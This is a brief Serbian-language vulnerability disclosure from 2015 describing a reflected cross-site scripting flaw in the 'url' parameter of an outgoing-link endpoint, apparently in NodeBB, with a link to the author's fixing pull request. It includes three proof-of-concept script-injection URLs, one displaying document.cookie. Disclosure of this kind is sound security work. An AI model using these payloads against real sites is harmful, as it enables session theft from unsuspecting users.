24.09.2015 - je objavljen propust

Primer kako iskoristiti propust:

http://www.[website]/outgoing?url=alert("XSS")
http://www.[website]/outgoing?url=<script>alert("CSXSS")</script>
http://www.[website]/outgoing?url=<script>alert(document.cookie)</script>

Detalji propusta:

Metoda: GET
Ranjiv parametar: url
Fajl: src/controllers/index.js

Cim sam pronasao propust, uradio sam pull request, sredio propust.

https://github.com/NodeBB/NodeBB/pull/3371

Linkovi:

PacketStorm Security

Vulnerability Lab